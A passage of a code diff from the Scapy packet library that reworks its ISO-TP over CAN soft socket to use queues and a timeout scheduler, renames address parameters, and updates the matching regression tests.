poll_time = self.rx_tx_poll_rate + self.rx_handle = TimeoutScheduler.schedule( + poll_time, self.can_recv) + else: + try: + self.rx_handle.cancel() + except Scapy_Exception: + pass + def on_can_recv(self, p): # type: (Packet) -> None - if p.identifier != self.dst_id: + if p.identifier != self.rx_id: if not self.filter_warning_emitted and conf.verb >= 2: warning("You should put a filter for identifier=%x on your " - "CAN socket", self.dst_id) + "CAN socket", self.rx_id) self.filter_warning_emitted = True else: self.on_recv(p) def close(self): # type: () -> None - if self.rx_thread.running: - self.rx_thread.stop(True) + try: + if select_objects([self.tx_queue], 0): + warning("TX queue not empty") + time.sleep(0.1) + except OSError: + pass + + try: + if select_objects([self.rx_queue], 0): + warning("RX queue not empty") + except OSError: + pass + + self.closed = True + try: + self.rx_handle.cancel() + except Scapy_Exception: + pass + try: + self.tx_handle.cancel() + except Scapy_Exception: + pass def _rx_timer_handler(self): # type: () -> None """Method called every time the rx_timer times out, due to the peer not sending a consecutive frame within the expected time window""" - with self.rx_mutex: - if self.rx_state == ISOTP_WAIT_DATA: - # we did not get new data frames in time. - # reset rx state - self.rx_state = ISOTP_IDLE - if conf.verb > 2: - warning("RX state was reset due to timeout") + if self.rx_state == ISOTP_WAIT_DATA: + # we did not get new data frames in time. + # reset rx state + self.rx_state = ISOTP_IDLE + if conf.verb > 2: + warning("RX state was reset due to timeout") def _tx_timer_handler(self): # type: () -> None @@ -611,56 +628,50 @@ def _tx_timer_handler(self): two situations: either a Flow Control frame was not received in time, or the Separation Time Min is expired and a new frame must be sent.""" - with self.tx_mutex: - if (self.tx_state == ISOTP_WAIT_FC or - self.tx_state == ISOTP_WAIT_FIRST_FC): - # we did not get any flow control frame in time - # reset tx state + if (self.tx_state == ISOTP_WAIT_FC or + self.tx_state == ISOTP_WAIT_FIRST_FC): + # we did not get any flow control frame in time + # reset tx state + self.tx_state = ISOTP_IDLE + warning("TX state was reset due to timeout") + return + elif self.tx_state == ISOTP_SENDING: + # push out the next segmented pdu + src_off = len(self.ea_hdr) + max_bytes = 7 - src_off + if self.tx_buf is None: self.tx_state = ISOTP_IDLE - self.tx_exception = "TX state was reset due to timeout" - self.tx_done.set() + warning("TX buffer is not filled") return - elif self.tx_state == ISOTP_SENDING: - # push out the next segmented pdu - src_off = len(self.ea_hdr) - max_bytes = 7 - src_off - if self.tx_buf is None: + while 1: + load = self.ea_hdr + load += struct.pack("B", N_PCI_CF + self.tx_sn) + load += self.tx_buf[self.tx_idx:self.tx_idx + max_bytes] + self.can_send(load) + + self.tx_sn = (self.tx_sn + 1) % 16 + self.tx_bs += 1 + self.tx_idx += max_bytes + + if len(self.tx_buf) <= self.tx_idx: + # we are done self.tx_state = ISOTP_IDLE - self.tx_exception = "TX buffer is not filled" - self.tx_done.set() return - while 1: - load = self.ea_hdr - load += struct.pack("B", N_PCI_CF + self.tx_sn) - load += self.tx_buf[self.tx_idx:self.tx_idx + max_bytes] - self.can_send(load) - - self.tx_sn = (self.tx_sn + 1) % 16 - self.tx_bs += 1 - self.tx_idx += max_bytes - - if len(self.tx_buf) <= self.tx_idx: - # we are done - self.tx_state = ISOTP_IDLE - self.tx_done.set() - for cb in self.tx_callbacks: - cb() - return - if self.txfc_bs != 0 and self.tx_bs >= self.txfc_bs: - # stop and wait for FC - self.tx_state = ISOTP_WAIT_FC - self.tx_timeout_handle = TimeoutScheduler.schedule( - self.fc_timeout, self._tx_timer_handler) - return + if self.txfc_bs != 0 and self.tx_bs >= self.txfc_bs: + # stop and wait for FC + self.tx_state = ISOTP_WAIT_FC + self.tx_timeout_handle = TimeoutScheduler.schedule( + self.fc_timeout, self._tx_timer_handler) + return - if self.tx_gap == 0: - continue - else: - # stop and wait for tx gap - self.tx_timeout_handle = TimeoutScheduler.schedule( - self.tx_gap, self._tx_timer_handler) - return + if self.tx_gap == 0: + continue + else: + # stop and wait for tx gap + self.tx_timeout_handle = TimeoutScheduler.schedule( + self.tx_gap, self._tx_timer_handler) + return def on_recv(self, cf): # type: (Packet) -> None @@ -673,31 +684,29 @@ def on_recv(self, cf): return ae = 0 - if self.extended_rx_addr is not None: + if self.rx_ext_address is not None: ae = 1 if len(data) < 3: return - if six.indexbytes(data, 0) != self.extended_rx_addr: + if six.indexbytes(data, 0) != self.rx_ext_address: return n_pci = six.indexbytes(data, ae) & 0xf0 if n_pci == N_PCI_FC: - with self.tx_mutex: - self._recv_fc(data[ae:]) + self._recv_fc(data[ae:]) elif n_pci == N_PCI_SF: - with self.rx_mutex: - self._recv_sf(data[ae:], cf.time) + self._recv_sf(data[ae:], cf.time) elif n_pci == N_PCI_FF: - with self.rx_mutex: - self._recv_ff(data[ae:], cf.time) + self._recv_ff(data[ae:], cf.time) elif n_pci == N_PCI_CF: - with self.rx_mutex: - self._recv_cf(data[ae:]) + self._recv_cf(data[ae:]) def _recv_fc(self, data): # type: (bytes) -> None """Process a received 'Flow Control' frame""" + log_runtime.debug("Processing FC") + if (self.tx_state != ISOTP_WAIT_FC and self.tx_state != ISOTP_WAIT_FIRST_FC): return @@ -708,8 +717,7 @@ def _recv_fc(self, data): if len(data) < 3: self.tx_state = ISOTP_IDLE - self.tx_exception = "CF frame discarded because it was too short" - self.tx_done.set() + warning("CF frame discarded because it was too short") return # get communication parameters only from the first FC frame @@ -747,18 +755,18 @@ def _recv_fc(self, data): elif isotp_fc == ISOTP_FC_OVFLW: # overflow in receiver side self.tx_state = ISOTP_IDLE - self.tx_exception = "Overflow happened at the receiver side" - self.tx_done.set() + warning("Overflow happened at the receiver side") return else: self.tx_state = ISOTP_IDLE - self.tx_exception = "Unknown FC frame type" - self.tx_done.set() + warning("Unknown FC frame type") return def _recv_sf(self, data, ts): # type: (bytes, Union[float, EDecimal]) -> None """Process a received 'Single Frame' frame""" + log_runtime.debug("Processing SF") + if self.rx_timeout_handle is not None: self.rx_timeout_handle.cancel() self.rx_timeout_handle = None @@ -774,12 +782,12 @@ def _recv_sf(self, data, ts): msg = data[1:1 + length] self.rx_queue.send((msg, ts)) - for cb in self.rx_callbacks: - cb(msg) def _recv_ff(self, data, ts): # type: (bytes, Union[float, EDecimal]) -> None """Process a received 'First Frame' frame""" + log_runtime.debug("Processing FF") + if self.rx_timeout_handle is not None: self.rx_timeout_handle.cancel() self.rx_timeout_handle = None @@ -832,6 +840,8 @@ def _recv_ff(self, data, ts): def _recv_cf(self, data): # type: (bytes) -> None """Process a received 'Consecutive Frame' frame""" + log_runtime.debug("Processing CF") + if self.rx_state != ISOTP_WAIT_DATA: return @@ -874,8 +884,6 @@ def _recv_cf(self, data): self.rx_buf = self.rx_buf[0:self.rx_len] self.rx_state = ISOTP_IDLE self.rx_queue.send((self.rx_buf, self.rx_ts)) - for cb in self.rx_callbacks: - cb(self.rx_buf) self.rx_buf = None return @@ -892,75 +900,77 @@ def _recv_cf(self, data): self.can_send(load) # wait for another CF + log_runtime.debug("Wait for another CF") self.rx_timeout_handle = TimeoutScheduler.schedule( self.cf_timeout, self._rx_timer_handler) def begin_send(self, x): # type: (bytes) -> None """Begins sending an ISOTP message. This method does not block.""" - with self.tx_mutex: - if self.tx_state != ISOTP_IDLE: - raise Scapy_Exception("Socket is already sending, retry later") - - self.tx_done.clear() - self.tx_exception = None - self.tx_state = ISOTP_SENDING - - length = len(x) - if length > ISOTP_MAX_DLEN_2015: - raise Scapy_Exception("Too much data for ISOTP message") + if self.tx_state != ISOTP_IDLE: + warning("Socket is already sending, retry later") + return - if len(self.ea_hdr) + length <= 7: - # send a single frame - data = self.ea_hdr - data += struct.pack("B", length) - data += x - self.tx_state = ISOTP_IDLE - self.can_send(data) - self.tx_done.set() - for cb in self.tx_callbacks: - cb() - return + self.tx_state = ISOTP_SENDING + length = len(x) + if length > ISOTP_MAX_DLEN_2015: + warning("Too much data for ISOTP message") - # send the first frame + if len(self.ea_hdr) + length <= 7: + # send a single frame data = self.ea_hdr - if length > ISOTP_MAX_DLEN: - data += struct.pack(">HI", 0x1000, length) - else: - data += struct.pack(">H", 0x1000 | length) - load = x[0:8 - len(data)] - data += load + data += struct.pack("B", length) + data += x + self.tx_state = ISOTP_IDLE self.can_send(data) + return - self.tx_buf = x - self.tx_sn = 1 - self.tx_bs = 0 - self.tx_idx = len(load) + # send the first frame + data = self.ea_hdr + if length > ISOTP_MAX_DLEN: + data += struct.pack(">HI", 0x1000, length) + else: + data += struct.pack(">H", 0x1000 | length) + load = x[0:8 - len(data)] + data += load + self.can_send(data) - self.tx_state = ISOTP_WAIT_FIRST_FC - self.tx_timeout_handle = TimeoutScheduler.schedule( - self.fc_timeout, self._tx_timer_handler) + self.tx_buf = x + self.tx_sn = 1 + self.tx_bs = 0 + self.tx_idx = len(load) + + self.tx_state = ISOTP_WAIT_FIRST_FC + self.tx_timeout_handle = TimeoutScheduler.schedule( + self.fc_timeout, self._tx_timer_handler) + + def _send(self): + # type: () -> None + if self.tx_state == ISOTP_IDLE: + if select_objects([self.tx_queue], 0): + pkt = self.tx_queue.recv() + if pkt: + self.begin_send(pkt) + + if not self.closed: + self.tx_handle = TimeoutScheduler.schedule( + self.rx_tx_poll_rate, self._send) + else: + try: + self.tx_handle.cancel() + except Scapy_Exception: + pass def send(self, p): # type: (bytes) -> None """Send an ISOTP frame and block until the message is sent or an error happens.""" - with self.send_mutex: - self.begin_send(p) - - # Wait until the tx callback is called - send_done = self.tx_done.wait(30) - if self.tx_exception is not None: - raise Scapy_Exception(self.tx_exception) - if not send_done: - raise Scapy_Exception("ISOTP send not completed in 30s") - return + self.tx_queue.send(p) def recv(self, timeout=None): # type: (Optional[int]) -> Optional[Tuple[bytes, Union[float, EDecimal]]] # noqa: E501 """Receive an ISOTP frame, blocking if none is available in the buffer for at most 'timeout' seconds.""" - try: return self.rx_queue.recv() except IndexError: diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 2a561f91ce4..75ac25ecc19 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -607,7 +607,10 @@ def read_all(self, count=-1): def recv(self, size=CAN_MTU): # type: (int) -> Optional[Packet] """Emulation of SuperSocket""" - return self.read_packet(size=size) + try: + return self.read_packet(size=size) + except EOFError: + return None def fileno(self): # type: () -> int diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 66152e8f0e5..cf040351c52 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -1,19 +1,30 @@ % Regression tests for ISOTPSoftSocket -~ automotive_comm disabled +~ automotive_comm + Configuration ~ conf = Imports - +import time from io import BytesIO import scapy.modules.six as six +from scapy.layers.can import * +from scapy.contrib.isotp import * +from scapy.contrib.isotp.isotp_soft_socket import TimeoutScheduler +from test.testsocket import TestSocket, cleanup_testsockets -with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: - exec(f.read()) += Redirect logging +import logging +from scapy.error import log_runtime -from test.testsocket import TestSocket, cleanup_testsockets +try: + from cStringIO import StringIO # Python 2 +except ImportError: + from io import StringIO +log_stream = StringIO() +handler = logging.StreamHandler(log_stream) +log_runtime.addHandler(handler) = Definition of utility functions @@ -55,104 +66,108 @@ assert(sniffed[0]['ISOTP'].rx_ext_address is 0xEA) = Single-frame receive -with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: +with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: cans.pair(stim) stim.send(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) - msg = s.sniff(count=1, timeout=1)[0] + pkts = s.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + msg = pkts[0] assert(msg.data == dhex("01 02 03 04 05")) = Single-frame send -with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: +with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: cans.pair(stim) s.send(ISOTP(dhex("01 02 03 04 05"))) - msg = stim.sniff(count=1, timeout=1)[0] + pkts = stim.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + msg = pkts[0] assert(msg.data == dhex("05 01 02 03 04 05")) = Two frame receive -with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: +with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: cans.pair(stim) stim.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) - c = stim.sniff(count=1, timeout=1)[0] + pkts = stim.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + c = pkts[0] assert (c.data == dhex("30 00 00")) stim.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) - msg = s.sniff(count=1, timeout=1)[0] + pkts = s.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + msg = pkts[0] assert(msg.data == dhex("01 02 03 04 05 06 07 08 09")) = 20000 bytes receive -with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: - cans.pair(stim) - data = dhex("01 02 03 04 05") * 4000 - cf = ISOTP(data, dst=0x241).fragment() - ff = cf.pop(0) - stim.send(ff) - c = stim.sniff(count=1, timeout=1)[0] - assert (c.data == dhex("30 00 00")) - for f in cf: - _ = stim.send(f) - msgs = s.sniff(count=1, timeout=30) - print(msgs) - msg = msgs[0] - assert(msg.data == data) +def test(): + with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: + cans.pair(stim) + data = dhex("01 02 03 04 05") * 4000 + cf = ISOTP(data, rx_id=0x241).fragment() + ff = cf.pop(0) + cs = stim.sniff(count=1, timeout=3, started_callback=lambda: stim.send(ff)) + assert len(cs) + c = cs[0] + assert (c.data == dhex("30 00 00")) + for f in cf: + _ = stim.send(f) + msgs = s.sniff(count=1, timeout=30) + print(msgs) + msg = msgs[0] + assert(msg.data == data) + +test() = 20000 bytes send -with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: - cans.pair(stim) - data = dhex("01 02 03 04 05")*4000 - msg = ISOTP(data, dst=0x641) - fragments = msg.fragment() - ack = CAN(identifier=0x241, data=dhex("30 00 00")) - sniffer = AsyncSniffer(opened_socket=stim, count=len(fragments), timeout=2, prn=lambda x: stim.send(ack)) - sniffer.start() - s.send(msg) - sniffer.join(timeout=3) - cfs = sniffer.results - for fragment, cf in zip(fragments, cfs): - assert (bytes(fragment) == bytes(cf)) +def test(): + with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: + cans.pair(stim) + data = dhex("01 02 03 04 05")*4000 + msg = ISOTP(data, rx_id=0x641) + fragments = msg.fragment() + ack = CAN(identifier=0x241, data=dhex("30 00 00")) + ff = stim.sniff(timeout=1, count=1, + started_callback=lambda:s.send(msg)) + assert len(ff) == 1 + cfs = stim.sniff(timeout=20, count=len(fragments) - 1, + started_callback=lambda: stim.send(ack)) + for fragment, cf in zip(fragments, ff + cfs): + assert (bytes(fragment) == bytes(cf)) + +test() = Close ISOTPSoftSocket -with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: +with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: cans.pair(stim) s.close() s = None -= Create and close ISOTP soft socket -with ISOTPSoftSocket(TestSocket(CAN), sid=0x641, did=0x241) as s: - assert(s.impl.rx_thread.running) - -assert(not s.impl.rx_thread.running) - - -= Verify that all threads will die when GC collects the socket -~ not_pypy -import gc -cans = TestSocket(CAN) -s = ISOTPSoftSocket(cans, sid=0x641, did=0x241) -assert(s.impl.rx_thread.running) -impl = s.impl -s = None -cans.close() -r = gc.collect() -assert(not impl.rx_thread.running) - = Test on_recv function with single frame -with ISOTPSoftSocket(TestSocket(CAN), sid=0x641, did=0x241) as s: +with ISOTPSoftSocket(TestSocket(CAN), tx_id=0x641, rx_id=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) msg, ts = s.ins.rx_queue.recv() assert(msg == dhex("01 02 03 04 05")) = Test on_recv function with empty frame -with ISOTPSoftSocket(TestSocket(CAN), sid=0x641, did=0x241) as s: +with ISOTPSoftSocket(TestSocket(CAN), tx_id=0x641, rx_id=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=b"")) assert(s.ins.rx_queue.empty()) = Test on_recv function with single frame and extended addressing -with ISOTPSoftSocket(TestSocket(CAN), sid=0x641, did=0x241, extended_rx_addr=0xea) as s: +with ISOTPSoftSocket(TestSocket(CAN), tx_id=0x641, rx_id=0x241, rx_ext_address=0xea) as s: cf = CAN(identifier=0x241, data=dhex("EA 05 01 02 03 04 05")) s.ins.on_recv(cf) msg, ts = s.ins.rx_queue.recv() @@ -163,7 +178,7 @@ with ISOTPSoftSocket(TestSocket(CAN), sid=0x641, did=0x241, extended_rx_addr=0xe cans = TestSocket(CAN) can_out = TestSocket(CAN) cans.pair(can_out) -with ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: +with ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=dhex("10 20 01 02 03 04 05 06"))) can = can_out.sniff(timeout=1, count=1)[0] assert(can.identifier == 0x641) @@ -184,34 +199,34 @@ with TestSocket(CAN) as ss, TestSocket(CAN) as sr: p = sr.sniff(count=1, timeout=0.2, started_callback=tx_func) assert(len(p)==1) -= Send single frame ISOTP message, using begin_send += Send single frame ISOTP message, using send with TestSocket(CAN) as isocan, \ - ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, \ + ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, \ TestSocket(CAN) as cans: cans.pair(isocan) - can = cans.sniff(timeout=2, count=1, started_callback=lambda: s.begin_send(ISOTP(data=dhex("01 02 03 04 05")))) + can = cans.sniff(timeout=2, count=1, started_callback=lambda: s.send(ISOTP(data=dhex("01 02 03 04 05")))) assert(can[0].identifier == 0x641) assert(can[0].data == dhex("05 01 02 03 04 05")) -= Send many single frame ISOTP messages, using begin_send += Send many single frame ISOTP messages, using send with TestSocket(CAN) as isocan, \ - ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, \ + ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, \ TestSocket(CAN) as cans: cans.pair(isocan) for i in range(100): data = dhex("01 02 03 04 05") + struct.pack("B", i) expected = struct.pack("B", len(data)) + data - can = cans.sniff(timeout=4, count=1, started_callback=lambda: s.begin_send(ISOTP(data=data))) + can = cans.sniff(timeout=4, count=1, started_callback=lambda: s.send(ISOTP(data=data))) assert(can[0].identifier == 0x641) print(can[0].data, data) assert(can[0].data == expected) -= Send two-frame ISOTP message, using begin_send -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: += Send two-frame ISOTP message, using send +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) - can = cans.sniff(timeout=1, count=1, started_callback=lambda: s.begin_send(ISOTP(data=dhex("01 02 03 04 05 06 07 08")))) + can = cans.sniff(timeout=1, count=1, started_callback=lambda: s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08")))) assert can[0].identifier == 0x641 assert can[0].data == dhex("10 08 01 02 03 04 05 06") can = cans.sniff(timeout=1, count=1, started_callback=lambda: cans.send(CAN(identifier = 0x241, data=dhex("30 00 00")))) @@ -219,7 +234,7 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as assert can[0].data == dhex("21 07 08") = Send single frame ISOTP message -with TestSocket(CAN) as cans, TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: +with TestSocket(CAN) as cans, TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s: cans.pair(isocan) s.send(ISOTP(data=dhex("01 02 03 04 05"))) can = cans.sniff(timeout=1, count=1) @@ -241,18 +256,30 @@ def acker(): thread = Thread(target=acker) thread.start() acker_ready.wait(timeout=5) -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) cans.pair(acks) isocan.pair(acks) s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] assert(can.identifier == 0x641) assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] assert(can.identifier == 0x241) assert(can.data == dhex("30 00 00")) - can = cans.sniff(timeout=1, count=1)[0] + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] assert(can.identifier == 0x641) assert(can.data == dhex("21 07 08")) @@ -273,18 +300,30 @@ def acker(): thread = Thread(target=acker) thread.start() acker_ready.wait(timeout=5) -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) cans.pair(acks) isocan.pair(acks) s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] assert(can.identifier == 0x641) assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] assert(can.identifier == 0x241) assert(can.data == dhex("30 20 00")) - can = cans.sniff(timeout=1, count=1)[0] + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] assert(can.identifier == 0x641) assert(can.data == dhex("21 07 08")) @@ -304,18 +343,30 @@ def acker(): thread = Thread(target=acker) thread.start() acker_ready.wait(timeout=5) -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) cans.pair(acks) isocan.pair(acks) s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] assert(can.identifier == 0x641) assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] assert(can.identifier == 0x241) assert(can.data == dhex("30 00 10")) - can = cans.sniff(timeout=1, count=1)[0] + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + can = pkts[0] assert(can.identifier == 0x641) assert(can.data == dhex("21 07 08")) @@ -325,10 +376,14 @@ assert not thread.is_alive() = Receive a single frame ISOTP message -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier = 0x241, data = dhex("05 01 02 03 04 05"))) - isotp = s.sniff(count=1, timeout=1)[0] + pkts = s.sniff(count=1, timeout=2) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + isotp = pkts[0] assert(isotp.data == dhex("01 02 03 04 05")) assert(isotp.tx_id == 0x641) assert(isotp.rx_id == 0x241) @@ -338,10 +393,14 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as = Receive a single frame ISOTP message, with extended addressing -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, extended_addr=0xc0, extended_rx_addr=0xea) as s, TestSocket(CAN) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, ext_address=0xc0, rx_ext_address=0xea) as s, TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier = 0x241, data = dhex("EA 05 01 02 03 04 05"))) - isotp = s.sniff(count=1, timeout=1)[0] + pkts = s.sniff(count=1, timeout=2) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + isotp = pkts[0] assert(isotp.data == dhex("01 02 03 04 05")) assert(isotp.tx_id == 0x641) assert(isotp.rx_id == 0x241) @@ -370,9 +429,12 @@ candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA vcan0 241 [3] 30 00 00 vcan0 541 [5] 21 AA AA AA AA''') -with ISOTPSoftSocket(CandumpReader(candump_fd), sid=0x241, did=0x541, listen_only=True) as s: +with ISOTPSoftSocket(CandumpReader(candump_fd), tx_id=0x241, rx_id=0x541, listen_only=True) as s: pkts = s.sniff(timeout=2, count=6) assert(len(pkts) == 6) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") isotp = pkts[0] print(repr(isotp)) print(hex(isotp.tx_id)) @@ -404,6 +466,11 @@ candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1, session_kwargs={"use_ext_address": False}) assert(len(pkts) == 6) + +if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + isotp = pkts[0] assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) assert (isotp.rx_id == 0x541) @@ -432,6 +499,10 @@ candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA vcan0 541 [5] 21 AA AA AA AA''') pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1) +if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + assert(len(pkts) == 12) isotp = pkts[1] assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) @@ -464,6 +535,10 @@ candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA vcan0 541 [5] 21 AA AA AA AA''') pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1, count=2) +if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + assert(len(pkts) == 2) isotp = pkts[1] assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) @@ -481,16 +556,20 @@ assert True = Receive a two-frame ISOTP message -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) - isotp = s.sniff(count=1, timeout=1)[0] + pkts = s.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + isotp = pkts[0] assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) = Check what happens when a CAN frame with wrong identifier gets received -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier = 0x141, data = dhex("05 01 02 03 04 05"))) assert(s.ins.rx_queue.empty()) @@ -498,7 +577,7 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as + Testing ISOTPSoftSocket timeouts = Check if not sending the last CF will make the socket timeout -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) cans.send(CAN(identifier = 